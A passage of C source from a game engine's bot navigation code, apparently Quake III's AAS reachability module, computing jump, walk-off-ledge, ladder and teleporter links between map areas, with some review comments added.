		p1[0] = (DotProduct(v1, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
		p1[1] = a2 * p1[0] + b2;
		//point on the edge vector of area2 closest to v2
		p2[0] = (DotProduct(v2, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
		p2[1] = a2 * p2[0] + b2;
	} //end if
	else
	{
		//point on the edge vector of area2 closest to v1
		p1[0] = v3[0];
		p1[1] = v1[1];
		//point on the edge vector of area2 closest to v2
		p2[0] = v3[0];
		p2[1] = v2[1];
	} //end else
	//
	if (dir1[0])
	{
		//
		a1 = dir1[1] / dir1[0];
		b1 = v1[1] - a1 * v1[0];
		//point on the edge vector of area1 closest to v3
		p3[0] = (DotProduct(v3, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
		p3[1] = a1 * p3[0] + b1;
		//point on the edge vector of area1 closest to v4
		p4[0] = (DotProduct(v4, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
		p4[1] = a1 * p4[0] + b1;
	} //end if
	else
	{
		//point on the edge vector of area1 closest to v3
		p3[0] = v1[0];
		p3[1] = v3[1];
		//point on the edge vector of area1 closest to v4
		p4[0] = v1[0];
		p4[1] = v4[1];
	} //end else
	//start with zero z-coordinates
	p1[2] = 0;
	p2[2] = 0;
	p3[2] = 0;
	p4[2] = 0;
	//calculate the z-coordinates from the ground planes
	//(plane equation: normal . p = dist, solved for p[2];
	//ground planes have non-zero normal[2] so the division is safe)
	p1[2] = (plane2->dist - DotProduct(plane2->normal, p1)) / plane2->normal[2];
	p2[2] = (plane2->dist - DotProduct(plane2->normal, p2)) / plane2->normal[2];
	p3[2] = (plane1->dist - DotProduct(plane1->normal, p3)) / plane1->normal[2];
	p4[2] = (plane1->dist - DotProduct(plane1->normal, p4)) / plane1->normal[2];
	//
	founddist = qfalse;
	//
	//for each projected point that falls within the other edge's extents,
	//either extend the current range (distance within half a unit of the
	//best) or restart the range at this single point pair (strictly closer)
	if (VectorBetweenVectors(p1, v3, v4))
	{
		dist = VectorDistance(v1, p1);
		//distance (nearly) equal to the best so far: widen the range of
		//closest points by moving the range endpoint that is farther away,
		//but only when that actually enlarges the range
		if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
		{
			dist1 = VectorDistance(beststart1, v1);
			dist2 = VectorDistance(beststart2, v1);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(v1, beststart2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(v1, beststart1);
			} //end else
			dist1 = VectorDistance(bestend1, p1);
			dist2 = VectorDistance(bestend2, p1);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(p1, bestend2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(p1, bestend1);
			} //end else
		} //end if
		//strictly closer pair found: collapse the range to this pair
		else if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v1, beststart1);
			VectorCopy(v1, beststart2);
			VectorCopy(p1, bestend1);
			VectorCopy(p1, bestend2);
		} //end if
		founddist = qtrue;
	} //end if
	if (VectorBetweenVectors(p2, v3, v4))
	{
		dist = VectorDistance(v2, p2);
		if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
		{
			dist1 = VectorDistance(beststart1, v2);
			dist2 = VectorDistance(beststart2, v2);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(v2, beststart2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(v2, beststart1);
			} //end else
			dist1 = VectorDistance(bestend1, p2);
			dist2 = VectorDistance(bestend2, p2);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(p2, bestend2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(p2, bestend1);
			} //end else
		} //end if
		else if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v2, beststart1);
			VectorCopy(v2, beststart2);
			VectorCopy(p2, bestend1);
			VectorCopy(p2, bestend2);
		} //end if
		founddist = qtrue;
	} //end else if
	if (VectorBetweenVectors(p3, v1, v2))
	{
		//NOTE: here the projected point p3 lies on edge1, so it becomes the
		//start of the candidate pair and v3 the end (mirrored vs. p1/p2)
		dist = VectorDistance(v3, p3);
		if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
		{
			dist1 = VectorDistance(beststart1, p3);
			dist2 = VectorDistance(beststart2, p3);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(p3, beststart2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(p3, beststart1);
			} //end else
			dist1 = VectorDistance(bestend1, v3);
			dist2 = VectorDistance(bestend2, v3);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(v3, bestend2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(v3, bestend1);
			} //end else
		} //end if
		else if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(p3, beststart1);
			VectorCopy(p3, beststart2);
			VectorCopy(v3, bestend1);
			VectorCopy(v3, bestend2);
		} //end if
		founddist = qtrue;
	} //end else if
	if (VectorBetweenVectors(p4, v1, v2))
	{
		dist = VectorDistance(v4, p4);
		if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
		{
			dist1 = VectorDistance(beststart1, p4);
			dist2 = VectorDistance(beststart2, p4);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(p4, beststart2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(p4, beststart1);
			} //end else
			dist1 = VectorDistance(bestend1, v4);
			dist2 = VectorDistance(bestend2, v4);
			if (dist1 > dist2)
			{
				if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(v4, bestend2);
			} //end if
			else
			{
				if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(v4, bestend1);
			} //end else
		} //end if
		else if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(p4, beststart1);
			VectorCopy(p4, beststart2);
			VectorCopy(v4, bestend1);
			VectorCopy(v4, bestend2);
		} //end if
		founddist = qtrue;
	} //end else if
	//if no shortest distance was found the shortest distance
	//is between one of the vertexes of edge1 and one of edge2
	if (!founddist)
	{
		//check all four vertex-to-vertex pairs; the range collapses to the
		//single closest pair in this case
		dist = VectorDistance(v1, v3);
		if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v1, beststart1);
			VectorCopy(v1, beststart2);
			VectorCopy(v3, bestend1);
			VectorCopy(v3, bestend2);
		} //end if
		dist = VectorDistance(v1, v4);
		if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v1, beststart1);
			VectorCopy(v1, beststart2);
			VectorCopy(v4, bestend1);
			VectorCopy(v4, bestend2);
		} //end if
		dist = VectorDistance(v2, v3);
		if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v2, beststart1);
			VectorCopy(v2, beststart2);
			VectorCopy(v3, bestend1);
			VectorCopy(v3, bestend2);
		} //end if
		dist = VectorDistance(v2, v4);
		if (dist < bestdist)
		{
			bestdist = dist;
			VectorCopy(v2, beststart1);
			VectorCopy(v2, beststart2);
			VectorCopy(v4, bestend1);
			VectorCopy(v4, bestend2);
		} //end if
	} //end if
	return bestdist;
} //end of the function AAS_ClosestEdgePoints
//===========================================================================
// creates possible jump reachabilities between the areas
//
// The two closest points on the ground of the areas are calculated
// One of the points will be on an edge of a ground face of area1 and
// one on an edge of a ground face of area2.
// If there is a range of closest points the point in the middle of this range
// is selected.
// Between these two points there must be one or more gaps.
// If the gaps exist a potential jump is predicted.
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Jump(int area1num, int area2num)
{
	//creates a possible jump or walk-off-ledge reachability from area1 to
	//area2 by finding the closest points between the ground edges of both
	//areas and predicting the movement between them
	//NOTE(review): the function always returns qfalse, even after a
	//reachability was successfully created — callers appear to rely on
	//this; confirm before changing
	int i, j, k, l, face1num, face2num, edge1num, edge2num, traveltype;
	int stopevent, areas[10], numareas;
	float phys_jumpvel, maxjumpdistance, maxjumpheight, height, bestdist, speed;
	float *v1, *v2, *v3, *v4;
	//FIX: AAS_ClosestEdgePoints only writes the closest point ranges when it
	//improves on bestdist; if the areas share no ground face edge pairs these
	//vectors were read uninitialized by the VectorMiddle calls below, which
	//is undefined behavior — zero-initialize them
	vec3_t beststart = {0, 0, 0}, beststart2 = {0, 0, 0};
	vec3_t bestend = {0, 0, 0}, bestend2 = {0, 0, 0};
	vec3_t teststart, testend, dir, velocity, cmdmove, up = {0, 0, 1}, sidewards;
	aas_area_t *area1, *area2;
	aas_face_t *face1, *face2;
	aas_edge_t *edge1, *edge2;
	aas_plane_t *plane1, *plane2, *plane;
	aas_trace_t trace;
	aas_clientmove_t move;
	aas_lreachability_t *lreach;
	//both areas must have a ground floor to jump from and land on
	if (!AAS_AreaGrounded(area1num) || !AAS_AreaGrounded(area2num)) return qfalse;
	//cannot jump from or to a crouch area
	if (AAS_AreaCrouch(area1num) || AAS_AreaCrouch(area2num)) return qfalse;
	//
	area1 = &aasworld.areas[area1num];
	area2 = &aasworld.areas[area2num];
	//
	phys_jumpvel = aassettings.phys_jumpvel;
	//maximum distance a player can jump
	maxjumpdistance = 2 * AAS_MaxJumpDistance(phys_jumpvel);
	//maximum height a player can jump with the given initial z velocity
	maxjumpheight = AAS_MaxJumpHeight(phys_jumpvel);
	//if the areas are not near anough in the x-y direction
	for (i = 0; i < 2; i++)
	{
		if (area1->mins[i] > area2->maxs[i] + maxjumpdistance) return qfalse;
		if (area1->maxs[i] < area2->mins[i] - maxjumpdistance) return qfalse;
	} //end for
	//if area2 is way to high to jump up to
	if (area2->mins[2] > area1->maxs[2] + maxjumpheight) return qfalse;
	//
	bestdist = 999999;
	//
	//find the closest range of points between the ground edges of both areas
	for (i = 0; i < area1->numfaces; i++)
	{
		face1num = aasworld.faceindex[area1->firstface + i];
		face1 = &aasworld.faces[abs(face1num)];
		//if not a ground face
		if (!(face1->faceflags & FACE_GROUND)) continue;
		//
		for (j = 0; j < area2->numfaces; j++)
		{
			face2num = aasworld.faceindex[area2->firstface + j];
			face2 = &aasworld.faces[abs(face2num)];
			//if not a ground face
			if (!(face2->faceflags & FACE_GROUND)) continue;
			//
			for (k = 0; k < face1->numedges; k++)
			{
				edge1num = abs(aasworld.edgeindex[face1->firstedge + k]);
				edge1 = &aasworld.edges[edge1num];
				for (l = 0; l < face2->numedges; l++)
				{
					edge2num = abs(aasworld.edgeindex[face2->firstedge + l]);
					edge2 = &aasworld.edges[edge2num];
					//calculate the minimum distance between the two edges
					v1 = aasworld.vertexes[edge1->v[0]];
					v2 = aasworld.vertexes[edge1->v[1]];
					v3 = aasworld.vertexes[edge2->v[0]];
					v4 = aasworld.vertexes[edge2->v[1]];
					//get the ground planes
					plane1 = &aasworld.planes[face1->planenum];
					plane2 = &aasworld.planes[face2->planenum];
					//
					bestdist = AAS_ClosestEdgePoints(v1, v2, v3, v4, plane1, plane2,
														beststart, bestend,
														beststart2, bestend2, bestdist);
				} //end for
			} //end for
		} //end for
	} //end for
	//if a range of closest points was found, take the middle of each range
	VectorMiddle(beststart, beststart2, beststart);
	VectorMiddle(bestend, bestend2, bestend);
	if (bestdist > 4 && bestdist < maxjumpdistance)
	{
//		Log_Write("shortest distance between %d and %d is %f\r\n", area1num, area2num, bestdist);
		// if very close and almost no height difference then the bot can walk
		if (bestdist <= 48 && fabs(beststart[2] - bestend[2]) < 8)
		{
			speed = 400;
			traveltype = TRAVEL_WALKOFFLEDGE;
		} //end if
		else if (AAS_HorizontalVelocityForJump(0, beststart, bestend, &speed))
		{
			//FIXME: why multiply with 1.2???
			speed *= 1.2f;
			traveltype = TRAVEL_WALKOFFLEDGE;
		} //end else if
		else
		{
			//get the horizontal speed for the jump, if it isn't possible to calculate this
			//speed (the jump is not possible) then there's no jump reachability created
			if (!AAS_HorizontalVelocityForJump(phys_jumpvel, beststart, bestend, &speed))
				return qfalse;
			speed *= 1.05f;
			traveltype = TRAVEL_JUMP;
			//
			//NOTE: test if the horizontal distance isn't too small
			VectorSubtract(bestend, beststart, dir);
			dir[2] = 0;
			if (VectorLength(dir) < 10)
				return qfalse;
		} //end if
		//
		//reject the reachability when a deadly or unjumpable drop lies just
		//past the start point (trace down from one unit towards the end)
		VectorSubtract(bestend, beststart, dir);
		VectorNormalize(dir);
		VectorMA(beststart, 1, dir, teststart);
		//
		VectorCopy(teststart, testend);
		testend[2] -= 100;
		trace = AAS_TraceClientBBox(teststart, testend, PRESENCE_NORMAL, -1);
		//
		if (trace.startsolid)
			return qfalse;
		if (trace.fraction < 1)
		{
			plane = &aasworld.planes[trace.planenum];
			// if the bot can stand on the surface
			if (DotProduct(plane->normal, up) >= 0.7)
			{
				// if no lava or slime below
				if (!(AAS_PointContents(trace.endpos) & (CONTENTS_LAVA|CONTENTS_SLIME)))
				{
					if (teststart[2] - trace.endpos[2] <= aassettings.phys_maxbarrier)
						return qfalse;
				} //end if
			} //end if
		} //end if
		//
		//same check just before the end point
		VectorMA(bestend, -1, dir, teststart);
		//
		VectorCopy(teststart, testend);
		testend[2] -= 100;
		trace = AAS_TraceClientBBox(teststart, testend, PRESENCE_NORMAL, -1);
		//
		if (trace.startsolid)
			return qfalse;
		if (trace.fraction < 1)
		{
			plane = &aasworld.planes[trace.planenum];
			// if the bot can stand on the surface
			if (DotProduct(plane->normal, up) >= 0.7)
			{
				// if no lava or slime below
				if (!(AAS_PointContents(trace.endpos) & (CONTENTS_LAVA|CONTENTS_SLIME)))
				{
					if (teststart[2] - trace.endpos[2] <= aassettings.phys_maxbarrier)
						return qfalse;
				} //end if
			} //end if
		} //end if
		//
		// get command movement
		VectorClear(cmdmove);
		if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_JUMP)
			cmdmove[2] = aassettings.phys_jumpvel;
		else
			cmdmove[2] = 0;
		//
		VectorSubtract(bestend, beststart, dir);
		dir[2] = 0;
		VectorNormalize(dir);
		CrossProduct(dir, up, sidewards);
		//
		stopevent = SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE;
		if (!AAS_AreaClusterPortal(area1num) && !AAS_AreaClusterPortal(area2num))
			stopevent |= SE_TOUCHCLUSTERPORTAL;
		//
		//predict the movement three times: straight at the end point and
		//slightly to either side of it
		for (i = 0; i < 3; i++)
		{
			//
			if (i == 1)
				//FIX: was VectorAdd(testend, sidewards, testend) — equivalent
				//only because testend still held bestend from the i == 0
				//pass; made the intent explicit and symmetric with i == 2
				VectorAdd(bestend, sidewards, testend);
			else if (i == 2)
				VectorSubtract(bestend, sidewards, testend);
			else
				VectorCopy(bestend, testend);
			VectorSubtract(testend, beststart, dir);
			dir[2] = 0;
			VectorNormalize(dir);
			VectorScale(dir, speed, velocity);
			//
			AAS_PredictClientMovement(&move, -1, beststart, PRESENCE_NORMAL, qtrue,
										velocity, cmdmove, 3, 30, 0.1f,
										stopevent, 0, qfalse);
			// if prediction time wasn't enough to fully predict the movement
			if (move.frames >= 30)
				return qfalse;
			// don't enter slime or lava and don't fall from too high
			if (move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA))
				return qfalse;
			// never jump or fall through a cluster portal
			if (move.stopevent & SE_TOUCHCLUSTERPORTAL)
				return qfalse;
			//the end position should be in area2, also test a little bit back
			//because the predicted jump could have rushed through the area
			VectorMA(move.endpos, -64, dir, teststart);
			teststart[2] += 1;
			numareas = AAS_TraceAreas(move.endpos, teststart, areas, NULL, ARRAY_LEN(areas));
			for (j = 0; j < numareas; j++)
			{
				if (areas[j] == area2num)
					break;
			} //end for
			if (j < numareas)
				break;
		}
		//none of the three predicted moves landed in area2
		if (i >= 3)
			return qfalse;
		//
#ifdef REACH_DEBUG
		//create the reachability
		Log_Write("jump reachability between %d and %d\r\n", area1num, area2num);
#endif //REACH_DEBUG
		//create a new reachability link
		lreach = AAS_AllocReachability();
		if (!lreach) return qfalse;
		lreach->areanum = area2num;
		lreach->facenum = 0;
		lreach->edgenum = 0;
		VectorCopy(beststart, lreach->start);
		VectorCopy(bestend, lreach->end);
		lreach->traveltype = traveltype;
		//estimate the travel time from the jump arc (mostly falling) or the
		//horizontal distance (mostly jumping)
		VectorSubtract(bestend, beststart, dir);
		height = dir[2];
		dir[2] = 0;
		if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_WALKOFFLEDGE && height > VectorLength(dir))
		{
			lreach->traveltime = aassettings.rs_startwalkoffledge + height * 50 / aassettings.phys_gravity;
		}
		else
		{
			lreach->traveltime = aassettings.rs_startjump + VectorDistance(bestend, beststart) * 240 / aassettings.phys_maxwalkvelocity;
		} //end if
		//
		//add a fall damage penalty when the drop hurts (unless landing on a jump pad)
		if (!AAS_AreaJumpPad(area2num))
		{
			if (AAS_FallDelta(beststart[2] - bestend[2]) > aassettings.phys_falldelta5)
			{
				lreach->traveltime += aassettings.rs_falldamage5;
			} //end if
			else if (AAS_FallDelta(beststart[2] - bestend[2]) > aassettings.phys_falldelta10)
			{
				lreach->traveltime += aassettings.rs_falldamage10;
			} //end if
		} //end if
		lreach->next = areareachability[area1num];
		areareachability[area1num] = lreach;
		//
		if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_JUMP)
			reach_jump++;
		else
			reach_walkoffledge++;
	} //end if
	return qfalse;
} //end of the function AAS_Reachability_Jump
//===========================================================================
// create a possible ladder reachability from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Ladder(int area1num, int area2num)
{
int i, j, k, l, edge1num, edge2num, sharededgenum = 0, lowestedgenum = 0;
int face1num, face2num, ladderface1num = 0, ladderface2num = 0;
int ladderface1vertical, ladderface2vertical, firstv;
float face1area, face2area, bestface1area = -9999, bestface2area = -9999;
float phys_jumpvel, maxjumpheight;
vec3_t area1point, area2point, v1, v2, up = {0, 0, 1};
vec3_t mid, lowestpoint = {0, 0}, start, end, sharededgevec, dir;
aas_area_t *area1, *area2;
aas_face_t *face1, *face2, *ladderface1 = NULL, *ladderface2 = NULL;
aas_plane_t *plane1, *plane2;
aas_edge_t *sharededge, *edge1;
aas_lreachability_t *lreach;
aas_trace_t trace;
if (!AAS_AreaLadder(area1num) || !AAS_AreaLadder(area2num)) return qfalse;
//
phys_jumpvel = aassettings.phys_jumpvel;
//maximum height a player can jump with the given initial z velocity
maxjumpheight = AAS_MaxJumpHeight(phys_jumpvel);
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
for (i = 0; i < area1->numfaces; i++)
{
face1num = aasworld.faceindex[area1->firstface + i];
face1 = &aasworld.faces[abs(face1num)];
//if not a ladder face
if (!(face1->faceflags & FACE_LADDER)) continue;
//
for (j = 0; j < area2->numfaces; j++)
{
face2num = aasworld.faceindex[area2->firstface + j];
face2 = &aasworld.faces[abs(face2num)];
//if not a ladder face
if (!(face2->faceflags & FACE_LADDER)) continue;
//check if the faces share an edge
for (k = 0; k < face1->numedges; k++)
{
edge1num = aasworld.edgeindex[face1->firstedge + k];
for (l = 0; l < face2->numedges; l++)
{
edge2num = aasworld.edgeindex[face2->firstedge + l];
if (abs(edge1num) == abs(edge2num))
{
//get the face with the largest area
face1area = AAS_FaceArea(face1);
face2area = AAS_FaceArea(face2);
if (face1area > bestface1area && face2area > bestface2area)
{
bestface1area = face1area;
bestface2area = face2area;
ladderface1 = face1;
ladderface2 = face2;
ladderface1num = face1num;
ladderface2num = face2num;
sharededgenum = edge1num;
} //end if
break;
} //end if
} //end for
if (l != face2->numedges) break;
} //end for
} //end for
} //end for
//
if (ladderface1 && ladderface2)
{
//get the middle of the shared edge
sharededge = &aasworld.edges[abs(sharededgenum)];
firstv = sharededgenum < 0;
//
VectorCopy(aasworld.vertexes[sharededge->v[firstv]], v1);
VectorCopy(aasworld.vertexes[sharededge->v[!firstv]], v2);
VectorAdd(v1, v2, area1point);
VectorScale(area1point, 0.5, area1point);
VectorCopy(area1point, area2point);
//
//if the face plane in area 1 is pretty much vertical
plane1 = &aasworld.planes[ladderface1->planenum ^ (ladderface1num < 0)];
plane2 = &aasworld.planes[ladderface2->planenum ^ (ladderface2num < 0)];
//
//get the points really into the areas
VectorSubtract(v2, v1, sharededgevec);
CrossProduct(plane1->normal, sharededgevec, dir);
VectorNormalize(dir);
//NOTE: 32 because that's larger than 16 (bot bbox x,y)
VectorMA(area1point, -32, dir, area1point);
VectorMA(area2point, 32, dir, area2point);
//
ladderface1vertical = abs(DotProduct(plane1->normal, up)) < 0.1;
ladderface2vertical = abs(DotProduct(plane2->normal, up)) < 0.1;
//there's only reachability between vertical ladder faces
if (!ladderface1vertical && !ladderface2vertical) return qfalse;
//if both vertical ladder faces
if (ladderface1vertical && ladderface2vertical
//and the ladder faces do not make a sharp corner
&& DotProduct(plane1->normal, plane2->normal) > 0.7
//and the shared edge is not too vertical
&& abs(DotProduct(sharededgevec, up)) < 0.7)
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area1point, lreach->start);
//VectorCopy(area2point, lreach->end);
VectorMA(area2point, -3, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface2num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area2point, lreach->start);
//VectorCopy(area1point, lreach->end);
VectorMA(area1point, -3, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_ladder++;
//
return qtrue;
} //end if
//if the second ladder face is also a ground face
//create ladder end (just ladder) reachability and
//walk off a ladder (ledge) reachability
if (ladderface1vertical && (ladderface2->faceflags & FACE_GROUND))
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area1point, lreach->start);
VectorCopy(area2point, lreach->end);
lreach->end[2] += 16;
VectorMA(lreach->end, -15, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface2num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area2point, lreach->start);
VectorCopy(area1point, lreach->end);
lreach->traveltype = TRAVEL_WALKOFFLEDGE;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_walkoffledge++;
//
return qtrue;
} //end if
//
if (ladderface1vertical)
{
//find lowest edge of the ladder face
lowestpoint[2] = 99999;
for (i = 0; i < ladderface1->numedges; i++)
{
edge1num = abs(aasworld.edgeindex[ladderface1->firstedge + i]);
edge1 = &aasworld.edges[edge1num];
//
VectorCopy(aasworld.vertexes[edge1->v[0]], v1);
VectorCopy(aasworld.vertexes[edge1->v[1]], v2);
//
VectorAdd(v1, v2, mid);
VectorScale(mid, 0.5, mid);
//
if (mid[2] < lowestpoint[2])
{
VectorCopy(mid, lowestpoint);
lowestedgenum = edge1num;
} //end if
} //end for
//
plane1 = &aasworld.planes[ladderface1->planenum];
//trace down in the middle of this edge
VectorMA(lowestpoint, 5, plane1->normal, start);
VectorCopy(start, end);
start[2] += 5;
end[2] -= 100;
//trace without entity collision
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//
//
#ifdef REACH_DEBUG
if (trace.startsolid)
{
Log_Write("trace from area %d started in solid\r\n", area1num);
} //end if
#endif //REACH_DEBUG
//
trace.endpos[2] += 1;
area2num = AAS_PointAreaNum(trace.endpos);
//
area2 = &aasworld.areas[area2num];
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//
if (face2->faceflags & FACE_LADDER)
{
plane2 = &aasworld.planes[face2->planenum];
if (abs(DotProduct(plane2->normal, up)) < 0.1) break;
} //end if
} //end for
//if from another area without vertical ladder faces
if (i >= area2->numfaces && area2num != area1num &&
//the reachabilities shouldn't exist already
!AAS_ReachabilityExists(area1num, area2num) &&
!AAS_ReachabilityExists(area2num, area1num))
{
//if the height is jumpable
if (start[2] - trace.endpos[2] < maxjumpheight)
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(lowestpoint, lreach->start);
VectorCopy(trace.endpos, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(trace.endpos, lreach->start);
//get the end point a little bit into the ladder
VectorMA(lowestpoint, -5, plane1->normal, lreach->end);
//get the end point a little higher
lreach->end[2] += 10;
lreach->traveltype = TRAVEL_JUMP;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_jump++;
//
return qtrue;
#ifdef REACH_DEBUG
Log_Write("jump up to ladder reach between %d and %d\r\n", area2num, area1num);
#endif //REACH_DEBUG
} //end if
#ifdef REACH_DEBUG
else Log_Write("jump too high between area %d and %d\r\n", area2num, area1num);
#endif //REACH_DEBUG
} //end if
/*//if slime or lava below the ladder
//try jump reachability from far towards the ladder
if (aasworld.areasettings[area2num].contents & (AREACONTENTS_SLIME
| AREACONTENTS_LAVA))
{
for (i = 20; i <= 120; i += 20)
{
//trace down in the middle of this edge
VectorMA(lowestpoint, i, plane1->normal, start);
VectorCopy(start, end);
start[2] += 5;
end[2] -= 100;
//trace without entity collision
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//
if (trace.startsolid) break;
trace.endpos[2] += 1;
area2num = AAS_PointAreaNum(trace.endpos);
if (area2num == area1num) continue;
//
if (start[2] - trace.endpos[2] > maxjumpheight) continue;
if (aasworld.areasettings[area2num].contents & (AREACONTENTS_SLIME
| AREACONTENTS_LAVA)) continue;
//
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(trace.endpos, lreach->start);
VectorCopy(lowestpoint, lreach->end);
lreach->end[2] += 5;
lreach->traveltype = TRAVEL_JUMP;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_jump++;
//
Log_Write("jump far to ladder reach between %d and %d\r\n", area2num, area1num);
//
break;
} //end for
} //end if*/
} //end if
} //end if
return qfalse;
} //end of the function AAS_Reachability_Ladder
//===========================================================================
// returns the travel flags encoding the "bot_notteam" key of the given
// entity; these flags mark reachabilities that one of the two teams
// should not use
//
// Parameter: ent : BSP entity to read the "bot_notteam" key from
// Returns: TRAVELFLAG_NOTTEAM1, TRAVELFLAG_NOTTEAM2 or 0
// Changes Globals: -
//===========================================================================
int AAS_TravelFlagsForTeam(int ent)
{
	int notteam;

	//no "bot_notteam" key: the reachability is usable by both teams
	//NOTE: was garbled to "¬team" by an HTML-entity mis-decode (&not;)
	if (!AAS_IntForBSPEpairKey(ent, "bot_notteam", &notteam))
		return 0;
	if (notteam == 1)
		return TRAVELFLAG_NOTTEAM1;
	if (notteam == 2)
		return TRAVELFLAG_NOTTEAM2;
	//any other value places no restriction on the reachability
	return 0;
} //end of the function AAS_TravelFlagsForTeam
//===========================================================================
// create possible teleporter reachabilities
// this is very game dependent.... :(
//
// classname = trigger_multiple or trigger_teleport
// target = "t1"
//
// classname = target_teleporter
// targetname = "t1"
// target = "t2"
//
// classname = misc_teleporter_dest
// targetname = "t2"
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_Teleport(void)
{
int area1num, area2num;
char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY];
char classname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
int ent, dest;
float angle;
vec3_t origin, destorigin, mins, maxs, end, angles;
vec3_t mid, velocity, cmdmove;
aas_lreachability_t *lreach;
aas_clientmove_t move;
aas_trace_t trace;
aas_link_t *areas, *link;
//check all BSP entities for teleport triggers
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "trigger_multiple"))
{
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
//#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "trigger_multiple model = \"%s\"\n", model);
//#endif REACH_DEBUG
VectorClear(angles);
//the model number follows the leading '*' in the model string
AAS_BSPModelMinsMaxsOrigin(atoi(model+1), angles, mins, maxs, origin);
//
